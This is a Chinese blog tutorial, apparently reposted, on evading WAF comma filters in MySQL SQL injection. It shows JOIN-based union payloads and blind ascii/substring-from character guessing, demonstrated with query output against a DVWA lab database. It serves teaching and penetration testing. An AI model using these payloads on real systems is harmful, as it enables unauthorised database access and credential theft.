zoukankan      html  css  js  c++  java

  • SQL注入--显注和盲注中过滤逗号绕过

    SQL注入逗号绕过

    1.联合查询显注绕过逗号

    在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联合查询不能用了。
    绕过
    在显示位上替换为常见的注入变量或其它语句

    union select 1,2,3;

union select * from ((select 1)A join (select 2)B join (select 3)C);

union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);

    在数据库中演示联合查询
    UNION开始是我们在URL中注入的语句,这里只是演示,在实际中如果我们在注入语句中有逗号就可能被拦截

    mysql> select user_id,user,password from users union select 1,2,3;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       1 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.04 sec)

    不出现逗号,使用Join来注入

    mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select 3)C);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       1 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)

    查询我们想要的数据

    mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);;
+---------+-------+-------------------------------------------------+
| user_id | user  | password                                        |
+---------+-------+-------------------------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99                |
|       1 | 2     | root@192.168.228.1 dvwa c:phpStudyMySQLdata |
+---------+-------+-------------------------------------------------+
2 rows in set (0.08 sec)

    2.盲注中逗号绕过

    MID 和substr 函数用于从文本字段中提取字符

    mysql> select mid(user(),1,2);
+-----------------+
| mid(user(),1,2) |
+-----------------+
| ro              |
+-----------------+
1 row in set (0.04 sec)

    查询数据库用户名第一个字符的ascii码

    mysql> select user_id,user,password from users union select ascii(mid(user(),1,2)),2,3;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|     114 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)

    盲注,通过猜ascii值

    mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=115) ;
Empty set

mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=114) ;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.04 sec)

    逗号绕过SUBTTRING 函数
    substring(str FROM pos)
    从字符串str的起始位置pos 返回一个子串

    mysql> select substring('hello' from 1);
+---------------------------+
| substring('hello' from 1) |
+---------------------------+
| hello                     |
+---------------------------+
1 row in set (0.04 sec)

mysql> select substring('hello' from 2);
+---------------------------+
| substring('hello' from 2) |
+---------------------------+
| ello                      |
+---------------------------+
1 row in set (0.03 sec)

    注入

    mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=114) ;
Empty set
//substring(user() from 2)为o
//o的ascii为111,
mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=111) ;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.03 sec)
  • 相关阅读:
    开源WebGIS实施方案(五):基于SLD实现图层符号化及其应用
    开源WebGIS实施方案(四):GeoServer发布PostGIS数据
    开源WebGIS实施方案(三):Shapefile数据导入到PostGIS
    jdbcType与javaType的对应关系
    关于fastjson的一个坑:输出json时,bean对象属性首字母默认被小写
    TortoiseSVN本地版本控制管理
    ArcGIS“一个或多个ActiveX控件无法显示...”问题的解决方案
    JavaWeb学习系列——第一个JavaWeb程序
    ArcGIS提取影像边界
    调皮的MySQL服务 请你不要再躲猫猫
  • 原文地址:https://www.cnblogs.com/hackxf/p/9490534.html
Copyright © 2011-2022 走看看